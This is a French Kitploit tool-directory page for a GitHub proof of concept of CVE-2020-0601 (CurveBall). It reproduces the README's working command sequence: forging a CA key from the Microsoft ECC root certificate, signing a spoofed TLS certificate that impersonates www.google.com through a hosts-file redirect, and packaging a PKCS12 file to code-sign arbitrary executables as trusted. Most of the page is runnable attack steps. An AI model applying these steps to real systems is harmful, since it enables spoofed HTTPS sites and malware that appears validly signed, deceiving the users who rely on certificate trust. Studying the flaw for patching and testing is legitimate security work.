Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-0601_PoC — Démonstration de CVE-2020-0601 alias curveball. Basé sur les PoC disponibles sur https://github.com/kudelskisecurity/chainoffools et https://github.com/ly4k/CurveBall | Kitploit
Outils/GitHubGitHub/joelbts/cve-2020-0601_poc
Analyse des VulnérabilitésAnalyse de CodeExploitationSécurité WebCryptographieTests d'Intrusion
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

Démonstration de CVE-2020-0601 alias curveball. Basé sur les PoC disponibles sur https://github.com/kudelskisecurity/chainoffools et https://github.com/ly4k/CurveBall

Voir le dépôt
27il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Basé sur le POC de https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


EXIGENCES / LOGICIELS UTILISÉS


python version 3.11 openssl version 3.1 osslsigncode version 2.5 bibliothèques python dans gen-key.py httpServer.py


SIGNATURE DE CERTIFICAT TLS


Créez une clé CA falsifiée à partir du certificat racine de confiance (doit être secp384r1 et au format PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Créez un CA falsifié en utilisant la clé falsifiée

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

Créez un autre certificat SSL (de tout type) qui sera signé par le CA falsifié

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Créez une demande de signature de certificat pour le certificat

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

Signez la CSR en utilisant le certificat CA falsifié

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

Démarrez un serveur HTTPS avec la chaîne de certificats falsifiée

python httpServer.py

SUR UNE MACHINE WINDOWS

Ajoutez <kali.machine.ip> www.google.com au fichier hosts (redirige google vers le serveur)

visitez HTTPS://www.google.com

Le certificat devrait être approuvé, et 'Hello World' devrait s'afficher

Si une erreur se produit, vérifiez que l'heure système est correcte


SIGNATURE DE CODE


Créez une clé CA falsifiée à partir du certificat racine de confiance (doit être secp384r1 et au format PEM)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

Créez un CA falsifié en utilisant la clé falsifiée

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

Créez une nouvelle clé pouvant être utilisée pour la signature de code

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

Créez une demande de signature de certificat en utilisant la clé, que nous pouvons signer

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

Signez la CSR en utilisant le CA falsifié

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

Regroupez la clé, le certificat et le CA falsifié dans un fichier PKCS12 pour signer des exécutables

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

Utilisez le fichier PKCS12 pour signer un exécutable

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

Télécharger l’outil